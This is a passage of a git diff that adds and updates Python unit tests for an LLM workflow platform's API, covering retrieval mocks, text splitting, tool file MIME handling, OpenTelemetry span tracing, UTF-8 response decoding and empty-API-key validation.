mock_retrieve.side_effect = side_effect_retrieve # Act results = RetrievalService.retrieve( @@ -1243,9 +1260,9 @@ class TestRetrievalService: # Assert assert results == [] - @patch("core.rag.datasource.retrieval_service.RetrievalService.embedding_search") + @patch("core.rag.datasource.retrieval_service.RetrievalService._retrieve") @patch("core.rag.datasource.retrieval_service.RetrievalService._get_dataset") - def test_retrieve_with_exception_handling(self, mock_get_dataset, mock_embedding_search, mock_dataset): + def test_retrieve_with_exception_handling(self, mock_get_dataset, mock_retrieve, mock_dataset): """ Test that exceptions during retrieval are properly handled. 
@@ -1256,22 +1273,26 @@ class TestRetrievalService: # Arrange mock_get_dataset.return_value = mock_dataset - # Make embedding_search add an exception to the exceptions list + # Make _retrieve add an exception to the exceptions list def side_effect_with_exception( flask_app, - dataset_id, - query, - top_k, - score_threshold, - reranking_model, - all_documents, retrieval_method, - exceptions, + dataset, + query=None, + top_k=4, + score_threshold=None, + reranking_model=None, + reranking_mode="reranking_model", + weights=None, document_ids_filter=None, + attachment_id=None, + all_documents=None, + exceptions=None, ): - exceptions.append("Search failed") + if exceptions is not None: + exceptions.append("Search failed") - mock_embedding_search.side_effect = side_effect_with_exception + mock_retrieve.side_effect = side_effect_with_exception # Act & Assert with pytest.raises(ValueError) as exc_info: @@ -1286,9 +1307,9 @@ class TestRetrievalService: # ==================== Score Threshold Tests ==================== - @patch("core.rag.datasource.retrieval_service.RetrievalService.embedding_search") + @patch("core.rag.datasource.retrieval_service.RetrievalService._retrieve") @patch("core.rag.datasource.retrieval_service.RetrievalService._get_dataset") - def test_vector_search_with_score_threshold(self, mock_get_dataset, mock_embedding_search, mock_dataset): + def test_vector_search_with_score_threshold(self, mock_get_dataset, mock_retrieve, mock_dataset): """ Test vector search with score threshold filtering. @@ -1306,21 +1327,25 @@ class TestRetrievalService: provider="dify", ) - def side_effect_embedding( + def side_effect_retrieve( flask_app, - dataset_id, - query, - top_k, - score_threshold, - reranking_model, - all_documents, retrieval_method, - exceptions, + dataset, + query=None, + top_k=4, + score_threshold=None, + reranking_model=None, + reranking_mode="reranking_model", + weights=None, document_ids_filter=None, + attachment_id=None, + all_documents=None, + exceptions=None, ): - all_documents.append(high_score_doc) + if all_documents is not None: + all_documents.append(high_score_doc) - mock_embedding_search.side_effect = side_effect_embedding + mock_retrieve.side_effect = side_effect_retrieve score_threshold = 0.8 @@ -1339,9 +1364,9 @@ class TestRetrievalService: # ==================== Top-K Limiting Tests ==================== - @patch("core.rag.datasource.retrieval_service.RetrievalService.embedding_search") + @patch("core.rag.datasource.retrieval_service.RetrievalService._retrieve") @patch("core.rag.datasource.retrieval_service.RetrievalService._get_dataset") - def test_retrieve_respects_top_k_limit(self, mock_get_dataset, mock_embedding_search, mock_dataset): + def test_retrieve_respects_top_k_limit(self, mock_get_dataset, mock_retrieve, mock_dataset): """ Test that retrieval respects top_k parameter. 
@@ -1362,22 +1387,26 @@ class TestRetrievalService: for i in range(10) ] - def side_effect_embedding( + def side_effect_retrieve( flask_app, - dataset_id, - query, - top_k, - score_threshold, - reranking_model, - all_documents, retrieval_method, - exceptions, + dataset, + query=None, + top_k=4, + score_threshold=None, + reranking_model=None, + reranking_mode="reranking_model", + weights=None, document_ids_filter=None, + attachment_id=None, + all_documents=None, + exceptions=None, ): # Return only top_k documents - all_documents.extend(many_docs[:top_k]) + if all_documents is not None: + all_documents.extend(many_docs[:top_k]) - mock_embedding_search.side_effect = side_effect_embedding + mock_retrieve.side_effect = side_effect_retrieve top_k = 3 @@ -1390,9 +1419,9 @@ class TestRetrievalService: ) # Assert - # Verify top_k was passed to embedding_search - assert mock_embedding_search.called - call_kwargs = mock_embedding_search.call_args.kwargs + # Verify _retrieve was called + assert mock_retrieve.called + call_kwargs = mock_retrieve.call_args.kwargs assert call_kwargs["top_k"] == top_k # Verify we got the right number of results assert len(results) == top_k @@ -1421,11 +1450,9 @@ class TestRetrievalService: # ==================== Reranking Tests ==================== - @patch("core.rag.datasource.retrieval_service.RetrievalService.embedding_search") + @patch("core.rag.datasource.retrieval_service.RetrievalService._retrieve") @patch("core.rag.datasource.retrieval_service.RetrievalService._get_dataset") - def test_semantic_search_with_reranking( - self, mock_get_dataset, mock_embedding_search, mock_dataset, sample_documents - ): + def test_semantic_search_with_reranking(self, mock_get_dataset, mock_retrieve, mock_dataset, sample_documents): """ Test semantic search with reranking model. 
@@ -1439,22 +1466,26 @@ class TestRetrievalService: # Simulate reranking changing order reranked_docs = list(reversed(sample_documents)) - def side_effect_embedding( + def side_effect_retrieve( flask_app, - dataset_id, - query, - top_k, - score_threshold, - reranking_model, - all_documents, retrieval_method, - exceptions, + dataset, + query=None, + top_k=4, + score_threshold=None, + reranking_model=None, + reranking_mode="reranking_model", + weights=None, document_ids_filter=None, + attachment_id=None, + all_documents=None, + exceptions=None, ): - # embedding_search handles reranking internally - all_documents.extend(reranked_docs) + # _retrieve handles reranking internally + if all_documents is not None: + all_documents.extend(reranked_docs) - mock_embedding_search.side_effect = side_effect_embedding + mock_retrieve.side_effect = side_effect_retrieve reranking_model = { "reranking_provider_name": "cohere", @@ -1473,7 +1504,7 @@ class TestRetrievalService: # Assert # For semantic search with reranking, reranking_model should be passed assert len(results) == 3 - call_kwargs = mock_embedding_search.call_args.kwargs + call_kwargs = mock_retrieve.call_args.kwargs assert call_kwargs["reranking_model"] == reranking_model diff --git a/api/tests/unit_tests/core/rag/splitter/test_text_splitter.py b/api/tests/unit_tests/core/rag/splitter/test_text_splitter.py index 7d246ac3cc..943a9e5712 100644 --- a/api/tests/unit_tests/core/rag/splitter/test_text_splitter.py +++ b/api/tests/unit_tests/core/rag/splitter/test_text_splitter.py @@ -901,6 +901,13 @@ class TestFixedRecursiveCharacterTextSplitter: # Verify no empty chunks assert all(len(chunk) > 0 for chunk in result) + def test_double_slash_n(self): + data = "chunk 1\n\nsubchunk 1.\nsubchunk 2.\n\n---\n\nchunk 2\n\nsubchunk 1\nsubchunk 2." 
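+        # The fixed separator is written with escaped newlines ("\\n"), as it
+        # would be stored in a workflow config; the splitter is expected to
+        # unescape it and split on the literal "\n\n---\n\n" in the text.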
+ separator = "\\n\\n---\\n\\n" + splitter = FixedRecursiveCharacterTextSplitter(fixed_separator=separator) + chunks = splitter.split_text(data) + assert chunks == ["chunk 1\n\nsubchunk 1.\nsubchunk 2.", "chunk 2\n\nsubchunk 1\nsubchunk 2."] + # ============================================================================ # Test Metadata Preservation diff --git a/api/tests/unit_tests/core/tools/utils/test_message_transformer.py b/api/tests/unit_tests/core/tools/utils/test_message_transformer.py new file mode 100644 index 0000000000..af3cdddd5f --- /dev/null +++ b/api/tests/unit_tests/core/tools/utils/test_message_transformer.py @@ -0,0 +1,86 @@ +import pytest + +import core.tools.utils.message_transformer as mt +from core.tools.entities.tool_entities import ToolInvokeMessage + + +class _FakeToolFile: + def __init__(self, mimetype: str): + self.id = "fake-tool-file-id" + self.mimetype = mimetype + + +class _FakeToolFileManager: + """Fake ToolFileManager to capture the mimetype passed in.""" + + last_call: dict | None = None + + def __init__(self, *args, **kwargs): + pass + + def create_file_by_raw( + self, + *, + user_id: str, + tenant_id: str, + conversation_id: str | None, + file_binary: bytes, + mimetype: str, + filename: str | None = None, + ): + type(self).last_call = { + "user_id": user_id, + "tenant_id": tenant_id, + "conversation_id": conversation_id, + "file_binary": file_binary, + "mimetype": mimetype, + "filename": filename, + } + return _FakeToolFile(mimetype) + + +@pytest.fixture(autouse=True) +def _patch_tool_file_manager(monkeypatch): + # Patch the manager used inside the transformer module + monkeypatch.setattr(mt, "ToolFileManager", _FakeToolFileManager) + # also ensure predictable URL generation (no need to patch; uses id and extension only) + yield + _FakeToolFileManager.last_call = None + + +def _gen(messages): + yield from messages + + +def test_transform_tool_invoke_messages_mimetype_key_present_but_none(): + # Arrange: a BLOB message whose meta contains a mime_type key set to None + blob = b"hello" + msg = ToolInvokeMessage( + type=ToolInvokeMessage.MessageType.BLOB, + message=ToolInvokeMessage.BlobMessage(blob=blob), + meta={"mime_type": None, "filename": "greeting"}, + ) + + # Act + out = list( + mt.ToolFileMessageTransformer.transform_tool_invoke_messages( + messages=_gen([msg]), + user_id="u1", + tenant_id="t1", + conversation_id="c1", + ) + ) + + # Assert: default to application/octet-stream when mime_type is present but None + assert _FakeToolFileManager.last_call is not None + assert _FakeToolFileManager.last_call["mimetype"] == "application/octet-stream" + + # Should yield a BINARY_LINK (not IMAGE_LINK) and the URL ends with .bin + assert len(out) == 1 + o = out[0] + assert o.type == ToolInvokeMessage.MessageType.BINARY_LINK + assert isinstance(o.message, ToolInvokeMessage.TextMessage) + assert o.message.text.endswith(".bin") + # meta is preserved (still contains mime_type: None) + assert "mime_type" in (o.meta or {}) + assert o.meta["mime_type"] is None diff --git a/api/tests/unit_tests/core/workflow/graph_engine/layers/__init__.py b/api/tests/unit_tests/core/workflow/graph_engine/layers/__init__.py new file mode 100644 index 0000000000..e69de29bb2 diff --git a/api/tests/unit_tests/core/workflow/graph_engine/layers/conftest.py b/api/tests/unit_tests/core/workflow/graph_engine/layers/conftest.py new file mode 100644 index 0000000000..b18a3369e9 --- /dev/null +++ b/api/tests/unit_tests/core/workflow/graph_engine/layers/conftest.py @@ -0,0 +1,101 @@ +""" +Shared 
fixtures for ObservabilityLayer tests. +""" + +from unittest.mock import MagicMock, patch + +import pytest +from opentelemetry.sdk.trace import TracerProvider +from opentelemetry.sdk.trace.export import SimpleSpanProcessor +from opentelemetry.sdk.trace.export.in_memory_span_exporter import InMemorySpanExporter +from opentelemetry.trace import set_tracer_provider + +from core.workflow.enums import NodeType + + +@pytest.fixture +def memory_span_exporter(): + """Provide an in-memory span exporter for testing.""" + return InMemorySpanExporter() + + +@pytest.fixture +def tracer_provider_with_memory_exporter(memory_span_exporter): + """Provide a TracerProvider configured with memory exporter.""" + import opentelemetry.trace as trace_api + + trace_api._TRACER_PROVIDER = None + trace_api._TRACER_PROVIDER_SET_ONCE._done = False + + provider = TracerProvider() + processor = SimpleSpanProcessor(memory_span_exporter) + provider.add_span_processor(processor) + set_tracer_provider(provider) + + yield provider + + provider.force_flush() + + +@pytest.fixture +def mock_start_node(): + """Create a mock Start Node.""" + node = MagicMock() + node.id = "test-start-node-id" + node.title = "Start Node" + node.execution_id = "test-start-execution-id" + node.node_type = NodeType.START + return node + + +@pytest.fixture +def mock_llm_node(): + """Create a mock LLM Node.""" + node = MagicMock() + node.id = "test-llm-node-id" + node.title = "LLM Node" + node.execution_id = "test-llm-execution-id" + node.node_type = NodeType.LLM + return node + + +@pytest.fixture +def mock_tool_node(): + """Create a mock Tool Node with tool-specific attributes.""" + from core.tools.entities.tool_entities import ToolProviderType + from core.workflow.nodes.tool.entities import ToolNodeData + + node = MagicMock() + node.id = "test-tool-node-id" + node.title = "Test Tool Node" + node.execution_id = "test-tool-execution-id" + node.node_type = NodeType.TOOL + + tool_data = ToolNodeData( + title="Test Tool Node", + desc=None, + provider_id="test-provider-id", + provider_type=ToolProviderType.BUILT_IN, + provider_name="test-provider", + tool_name="test-tool", + tool_label="Test Tool", + tool_configurations={}, + tool_parameters={}, + ) + node._node_data = tool_data + + return node + + +@pytest.fixture +def mock_is_instrument_flag_enabled_false(): + """Mock is_instrument_flag_enabled to return False.""" + with patch("core.workflow.graph_engine.layers.observability.is_instrument_flag_enabled", return_value=False): + yield + + +@pytest.fixture +def mock_is_instrument_flag_enabled_true(): + """Mock is_instrument_flag_enabled to return True.""" + with patch("core.workflow.graph_engine.layers.observability.is_instrument_flag_enabled", return_value=True): + yield diff --git a/api/tests/unit_tests/core/workflow/graph_engine/layers/test_observability.py b/api/tests/unit_tests/core/workflow/graph_engine/layers/test_observability.py new file mode 100644 index 0000000000..458cf2cc67 --- /dev/null +++ b/api/tests/unit_tests/core/workflow/graph_engine/layers/test_observability.py @@ -0,0 +1,219 @@ +""" +Tests for ObservabilityLayer. 
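+Spans are captured by an in-memory exporter (wired up in conftest.py), so
+tests can assert on finished spans directly without a real collector.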
+ +Test coverage: +- Initialization and enable/disable logic +- Node span lifecycle (start, end, error handling) +- Parser integration (default and tool-specific) +- Graph lifecycle management +- Disabled mode behavior +""" + +from unittest.mock import patch + +import pytest +from opentelemetry.trace import StatusCode + +from core.workflow.enums import NodeType +from core.workflow.graph_engine.layers.observability import ObservabilityLayer + + +class TestObservabilityLayerInitialization: + """Test ObservabilityLayer initialization logic.""" + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_initialization_when_otel_enabled(self, tracer_provider_with_memory_exporter): + """Test that layer initializes correctly when OTel is enabled.""" + layer = ObservabilityLayer() + assert not layer._is_disabled + assert layer._tracer is not None + assert NodeType.TOOL in layer._parsers + assert layer._default_parser is not None + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", False) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_true") + def test_initialization_when_instrument_flag_enabled(self, tracer_provider_with_memory_exporter): + """Test that layer enables when instrument flag is enabled.""" + layer = ObservabilityLayer() + assert not layer._is_disabled + assert layer._tracer is not None + assert NodeType.TOOL in layer._parsers + assert layer._default_parser is not None + + +class TestObservabilityLayerNodeSpanLifecycle: + """Test node span creation and lifecycle management.""" + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_node_span_created_and_ended( + self, tracer_provider_with_memory_exporter, memory_span_exporter, mock_llm_node + ): + """Test that span is created on node start and ended on node end.""" + layer = ObservabilityLayer() + layer.on_graph_start() + + layer.on_node_run_start(mock_llm_node) + layer.on_node_run_end(mock_llm_node, None) + + spans = memory_span_exporter.get_finished_spans() + assert len(spans) == 1 + assert spans[0].name == mock_llm_node.title + assert spans[0].status.status_code == StatusCode.OK + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_node_error_recorded_in_span( + self, tracer_provider_with_memory_exporter, memory_span_exporter, mock_llm_node + ): + """Test that node execution errors are recorded in span.""" + layer = ObservabilityLayer() + layer.on_graph_start() + + error = ValueError("Test error") + layer.on_node_run_start(mock_llm_node) + layer.on_node_run_end(mock_llm_node, error) + + spans = memory_span_exporter.get_finished_spans() + assert len(spans) == 1 + assert spans[0].status.status_code == StatusCode.ERROR + assert len(spans[0].events) > 0 + assert any("exception" in event.name.lower() for event in spans[0].events) + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_node_end_without_start_handled_gracefully( + self, tracer_provider_with_memory_exporter, memory_span_exporter, mock_llm_node + ): + """Test that ending a node without start doesn't crash.""" + layer = ObservabilityLayer() + layer.on_graph_start() + + 
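+        # No span was ever opened for this node, so ending it should be a
+        # silent no-op rather than an error.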
layer.on_node_run_end(mock_llm_node, None) + + spans = memory_span_exporter.get_finished_spans() + assert len(spans) == 0 + + +class TestObservabilityLayerParserIntegration: + """Test parser integration for different node types.""" + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_default_parser_used_for_regular_node( + self, tracer_provider_with_memory_exporter, memory_span_exporter, mock_start_node + ): + """Test that default parser is used for non-tool nodes.""" + layer = ObservabilityLayer() + layer.on_graph_start() + + layer.on_node_run_start(mock_start_node) + layer.on_node_run_end(mock_start_node, None) + + spans = memory_span_exporter.get_finished_spans() + assert len(spans) == 1 + attrs = spans[0].attributes + assert attrs["node.id"] == mock_start_node.id + assert attrs["node.execution_id"] == mock_start_node.execution_id + assert attrs["node.type"] == mock_start_node.node_type.value + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_tool_parser_used_for_tool_node( + self, tracer_provider_with_memory_exporter, memory_span_exporter, mock_tool_node + ): + """Test that tool parser is used for tool nodes.""" + layer = ObservabilityLayer() + layer.on_graph_start() + + layer.on_node_run_start(mock_tool_node) + layer.on_node_run_end(mock_tool_node, None) + + spans = memory_span_exporter.get_finished_spans() + assert len(spans) == 1 + attrs = spans[0].attributes + assert attrs["node.id"] == mock_tool_node.id + assert attrs["tool.provider.id"] == mock_tool_node._node_data.provider_id + assert attrs["tool.provider.type"] == mock_tool_node._node_data.provider_type.value + assert attrs["tool.name"] == mock_tool_node._node_data.tool_name + + +class TestObservabilityLayerGraphLifecycle: + """Test graph lifecycle management.""" + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_on_graph_start_clears_contexts(self, tracer_provider_with_memory_exporter, mock_llm_node): + """Test that on_graph_start clears node contexts.""" + layer = ObservabilityLayer() + layer.on_graph_start() + + layer.on_node_run_start(mock_llm_node) + assert len(layer._node_contexts) == 1 + + layer.on_graph_start() + assert len(layer._node_contexts) == 0 + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_on_graph_end_with_no_unfinished_spans( + self, tracer_provider_with_memory_exporter, memory_span_exporter, mock_llm_node + ): + """Test that on_graph_end handles normal completion.""" + layer = ObservabilityLayer() + layer.on_graph_start() + + layer.on_node_run_start(mock_llm_node) + layer.on_node_run_end(mock_llm_node, None) + layer.on_graph_end(None) + + spans = memory_span_exporter.get_finished_spans() + assert len(spans) == 1 + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_on_graph_end_with_unfinished_spans_logs_warning( + self, tracer_provider_with_memory_exporter, mock_llm_node, caplog + ): + """Test that on_graph_end logs warning for unfinished spans.""" + layer = ObservabilityLayer() + layer.on_graph_start() + + 
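+        # Open a span but never close it; on_graph_end is expected to clean
+        # up the leftover context and log a warning.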
layer.on_node_run_start(mock_llm_node) + assert len(layer._node_contexts) == 1 + + layer.on_graph_end(None) + + assert len(layer._node_contexts) == 0 + assert "node spans were not properly ended" in caplog.text + + +class TestObservabilityLayerDisabledMode: + """Test behavior when layer is disabled.""" + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", False) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_disabled_mode_skips_node_start(self, memory_span_exporter, mock_start_node): + """Test that disabled layer doesn't create spans on node start.""" + layer = ObservabilityLayer() + assert layer._is_disabled + + layer.on_graph_start() + layer.on_node_run_start(mock_start_node) + layer.on_node_run_end(mock_start_node, None) + + spans = memory_span_exporter.get_finished_spans() + assert len(spans) == 0 + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", False) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_disabled_mode_skips_node_end(self, memory_span_exporter, mock_llm_node): + """Test that disabled layer doesn't process node end.""" + layer = ObservabilityLayer() + assert layer._is_disabled + + layer.on_node_run_end(mock_llm_node, None) + + spans = memory_span_exporter.get_finished_spans() + assert len(spans) == 0 diff --git a/api/tests/unit_tests/core/workflow/graph_engine/test_end_node_without_value_type.py b/api/tests/unit_tests/core/workflow/graph_engine/test_end_node_without_value_type.py new file mode 100644 index 0000000000..b1380cd6d2 --- /dev/null +++ b/api/tests/unit_tests/core/workflow/graph_engine/test_end_node_without_value_type.py @@ -0,0 +1,60 @@ +""" +Test case for end node without value_type field (backward compatibility). + +This test validates that end nodes work correctly even when the value_type +field is missing from the output configuration, ensuring backward compatibility +with older workflow definitions. +""" + +from core.workflow.graph_events import ( + GraphRunStartedEvent, + GraphRunSucceededEvent, + NodeRunStartedEvent, + NodeRunStreamChunkEvent, + NodeRunSucceededEvent, +) + +from .test_table_runner import TableTestRunner, WorkflowTestCase + + +def test_end_node_without_value_type_field(): + """ + Test that end node works without explicit value_type field. + + The fixture implements a simple workflow that: + 1. Takes a query input from start node + 2. Passes it directly to end node + 3. End node outputs the value without specifying value_type + 4. Should correctly infer the type and output the value + + This ensures backward compatibility with workflow definitions + created before value_type became a required field. 
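+
+    Concretely: with inputs {"query": "test query"}, the workflow should
+    emit {"query": "test query"} unchanged.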
+ """ + fixture_name = "end_node_without_value_type_field_workflow" + + case = WorkflowTestCase( + fixture_path=fixture_name, + inputs={"query": "test query"}, + expected_outputs={"query": "test query"}, + expected_event_sequence=[ + # Graph start + GraphRunStartedEvent, + # Start node + NodeRunStartedEvent, + NodeRunStreamChunkEvent, # Start node streams the input value + NodeRunSucceededEvent, + # End node + NodeRunStartedEvent, + NodeRunSucceededEvent, + # Graph end + GraphRunSucceededEvent, + ], + description="End node without value_type field should work correctly", + ) + + runner = TableTestRunner() + result = runner.run_test_case(case) + assert result.success, f"Test failed: {result.error}" + assert result.actual_outputs == {"query": "test query"}, ( + f"Expected output to be {{'query': 'test query'}}, got {result.actual_outputs}" + ) diff --git a/api/tests/unit_tests/core/workflow/nodes/http_request/test_entities.py b/api/tests/unit_tests/core/workflow/nodes/http_request/test_entities.py index 0f6b7e4ab6..47a5df92a4 100644 --- a/api/tests/unit_tests/core/workflow/nodes/http_request/test_entities.py +++ b/api/tests/unit_tests/core/workflow/nodes/http_request/test_entities.py @@ -1,3 +1,4 @@ +import json from unittest.mock import Mock, PropertyMock, patch import httpx @@ -138,3 +139,95 @@ def test_is_file_with_no_content_disposition(mock_response): type(mock_response).content = PropertyMock(return_value=bytes([0x00, 0xFF] * 512)) response = Response(mock_response) assert response.is_file + + +# UTF-8 Encoding Tests +@pytest.mark.parametrize( + ("content_bytes", "expected_text", "description"), + [ + # Chinese UTF-8 bytes + ( + b'{"message": "\xe4\xbd\xa0\xe5\xa5\xbd\xe4\xb8\x96\xe7\x95\x8c"}', + '{"message": "你好世界"}', + "Chinese characters UTF-8", + ), + # Japanese UTF-8 bytes + ( + b'{"message": "\xe3\x81\x93\xe3\x82\x93\xe3\x81\xab\xe3\x81\xa1\xe3\x81\xaf"}', + '{"message": "こんにちは"}', + "Japanese characters UTF-8", + ), + # Korean UTF-8 bytes + ( + b'{"message": "\xec\x95\x88\xeb\x85\x95\xed\x95\x98\xec\x84\xb8\xec\x9a\x94"}', + '{"message": "안녕하세요"}', + "Korean characters UTF-8", + ), + # Arabic UTF-8 + (b'{"text": "\xd9\x85\xd8\xb1\xd8\xad\xd8\xa8\xd8\xa7"}', '{"text": "مرحبا"}', "Arabic characters UTF-8"), + # European characters UTF-8 + (b'{"text": "Caf\xc3\xa9 M\xc3\xbcnchen"}', '{"text": "Café München"}', "European accented characters"), + # Simple ASCII + (b'{"text": "Hello World"}', '{"text": "Hello World"}', "Simple ASCII text"), + ], +) +def test_text_property_utf8_decoding(mock_response, content_bytes, expected_text, description): + """Test that Response.text properly decodes UTF-8 content with charset_normalizer""" + mock_response.headers = {"content-type": "application/json; charset=utf-8"} + type(mock_response).content = PropertyMock(return_value=content_bytes) + # Mock httpx response.text to return something different (simulating potential encoding issues) + mock_response.text = "incorrect-fallback-text" # To ensure we are not falling back to httpx's text property + + response = Response(mock_response) + + # Our enhanced text property should decode properly using charset_normalizer + assert response.text == expected_text, ( + f"Failed for {description}: got {repr(response.text)}, expected {repr(expected_text)}" + ) + + +def test_text_property_fallback_to_httpx(mock_response): + """Test that Response.text falls back to httpx.text when charset_normalizer fails""" + mock_response.headers = {"content-type": "application/json"} + + # Create malformed UTF-8 bytes + 
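+    # 0xFF is never a valid UTF-8 leading byte, so charset detection should
+    # fail on this payload and force the httpx fallback.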
malformed_bytes = b'{"text": "\xff\xfe\x00\x00 invalid"}' + type(mock_response).content = PropertyMock(return_value=malformed_bytes) + + # Mock httpx.text to return some fallback value + fallback_text = '{"text": "fallback"}' + mock_response.text = fallback_text + + response = Response(mock_response) + + # Should fall back to httpx's text when charset_normalizer fails + assert response.text == fallback_text + + +@pytest.mark.parametrize( + ("json_content", "description"), + [ + # JSON with escaped Unicode (like Flask jsonify()) + ('{"message": "\\u4f60\\u597d\\u4e16\\u754c"}', "JSON with escaped Unicode"), + # JSON with mixed escape sequences and UTF-8 + ('{"mixed": "Hello \\u4f60\\u597d"}', "Mixed escaped and regular text"), + # JSON with complex escape sequences + ('{"complex": "\\ud83d\\ude00\\u4f60\\u597d"}', "Emoji and Chinese escapes"), + ], +) +def test_text_property_with_escaped_unicode(mock_response, json_content, description): + """Test Response.text with JSON containing Unicode escape sequences""" + mock_response.headers = {"content-type": "application/json"} + + content_bytes = json_content.encode("utf-8") + type(mock_response).content = PropertyMock(return_value=content_bytes) + mock_response.text = json_content # httpx would return the same for valid UTF-8 + + response = Response(mock_response) + + # Should preserve the escape sequences (valid JSON) + assert response.text == json_content, f"Failed for {description}" + + # The text should be valid JSON that can be parsed back to proper Unicode + parsed = json.loads(response.text) + assert isinstance(parsed, dict), f"Invalid JSON for {description}" diff --git a/api/tests/unit_tests/core/workflow/nodes/http_request/test_http_request_executor.py b/api/tests/unit_tests/core/workflow/nodes/http_request/test_http_request_executor.py index f040a92b6f..27df938102 100644 --- a/api/tests/unit_tests/core/workflow/nodes/http_request/test_http_request_executor.py +++ b/api/tests/unit_tests/core/workflow/nodes/http_request/test_http_request_executor.py @@ -1,3 +1,5 @@ +import pytest + from core.workflow.nodes.http_request import ( BodyData, HttpRequestNodeAuthorization, @@ -5,6 +7,7 @@ from core.workflow.nodes.http_request import ( HttpRequestNodeData, ) from core.workflow.nodes.http_request.entities import HttpRequestNodeTimeout +from core.workflow.nodes.http_request.exc import AuthorizationConfigError from core.workflow.nodes.http_request.executor import Executor from core.workflow.runtime import VariablePool from core.workflow.system_variable import SystemVariable @@ -348,3 +351,127 @@ def test_init_params(): executor = create_executor("key1:value1\n\nkey2:value2\n\n") executor._init_params() assert executor.params == [("key1", "value1"), ("key2", "value2")] + + +def test_empty_api_key_raises_error_bearer(): + """Test that empty API key raises AuthorizationConfigError for bearer auth.""" + variable_pool = VariablePool(system_variables=SystemVariable.empty()) + node_data = HttpRequestNodeData( + title="test", + method="get", + url="http://example.com", + headers="", + params="", + authorization=HttpRequestNodeAuthorization( + type="api-key", + config={"type": "bearer", "api_key": ""}, + ), + ) + timeout = HttpRequestNodeTimeout(connect=10, read=30, write=30) + + with pytest.raises(AuthorizationConfigError, match="API key is required"): + Executor( + node_data=node_data, + timeout=timeout, + variable_pool=variable_pool, + ) + + +def test_empty_api_key_raises_error_basic(): + """Test that empty API key raises AuthorizationConfigError for 
basic auth.""" + variable_pool = VariablePool(system_variables=SystemVariable.empty()) + node_data = HttpRequestNodeData( + title="test", + method="get", + url="http://example.com", + headers="", + params="", + authorization=HttpRequestNodeAuthorization( + type="api-key", + config={"type": "basic", "api_key": ""}, + ), + ) + timeout = HttpRequestNodeTimeout(connect=10, read=30, write=30) + + with pytest.raises(AuthorizationConfigError, match="API key is required"): + Executor( + node_data=node_data, + timeout=timeout, + variable_pool=variable_pool, + ) + + +def test_empty_api_key_raises_error_custom(): + """Test that empty API key raises AuthorizationConfigError for custom auth.""" + variable_pool = VariablePool(system_variables=SystemVariable.empty()) + node_data = HttpRequestNodeData( + title="test", + method="get", + url="http://example.com", + headers="", + params="", + authorization=HttpRequestNodeAuthorization( + type="api-key", + config={"type": "custom", "api_key": "", "header": "X-Custom-Auth"}, + ), + ) + timeout = HttpRequestNodeTimeout(connect=10, read=30, write=30) + + with pytest.raises(AuthorizationConfigError, match="API key is required"): + Executor( + node_data=node_data, + timeout=timeout, + variable_pool=variable_pool, + ) + + +def test_whitespace_only_api_key_raises_error(): + """Test that whitespace-only API key raises AuthorizationConfigError.""" + variable_pool = VariablePool(system_variables=SystemVariable.empty()) + node_data = HttpRequestNodeData( + title="test", + method="get", + url="http://example.com", + headers="", + params="", + authorization=HttpRequestNodeAuthorization( + type="api-key", + config={"type": "bearer", "api_key": " "}, + ), + ) + timeout = HttpRequestNodeTimeout(connect=10, read=30, write=30) + + with pytest.raises(AuthorizationConfigError, match="API key is required"): + Executor( + node_data=node_data, + timeout=timeout, + variable_pool=variable_pool, + ) + + +def test_valid_api_key_works(): + """Test that valid API key works correctly for bearer auth.""" + variable_pool = VariablePool(system_variables=SystemVariable.empty()) + node_data = HttpRequestNodeData( + title="test", + method="get", + url="http://example.com", + headers="", + params="", + authorization=HttpRequestNodeAuthorization( + type="api-key", + config={"type": "bearer", "api_key": "valid-api-key-123"}, + ), + ) + timeout = HttpRequestNodeTimeout(connect=10, read=30, write=30) + + executor = Executor( + node_data=node_data, + timeout=timeout, + variable_pool=variable_pool, + ) + + # Should not raise an error + headers = executor._assembling_headers() + assert "Authorization" in headers + assert headers["Authorization"] == "Bearer valid-api-key-123" diff --git a/api/tests/unit_tests/core/workflow/nodes/test_start_node_json_object.py b/api/tests/unit_tests/core/workflow/nodes/test_start_node_json_object.py index 83799c9508..539e72edb5 100644 --- a/api/tests/unit_tests/core/workflow/nodes/test_start_node_json_object.py +++ b/api/tests/unit_tests/core/workflow/nodes/test_start_node_json_object.py @@ -1,3 +1,4 @@ +import json import time import pytest @@ -46,14 +47,16 @@ def make_start_node(user_inputs, variables): def test_json_object_valid_schema(): - schema = { - "type": "object", - "properties": { - "age": {"type": "number"}, - "name": {"type": "string"}, - }, - "required": ["age"], - } + schema = json.dumps( + { + "type": "object", + "properties": { + "age": {"type": "number"}, + "name": {"type": "string"}, + }, + "required": ["age"], + } + ) variables = [ VariableEntity( @@ 
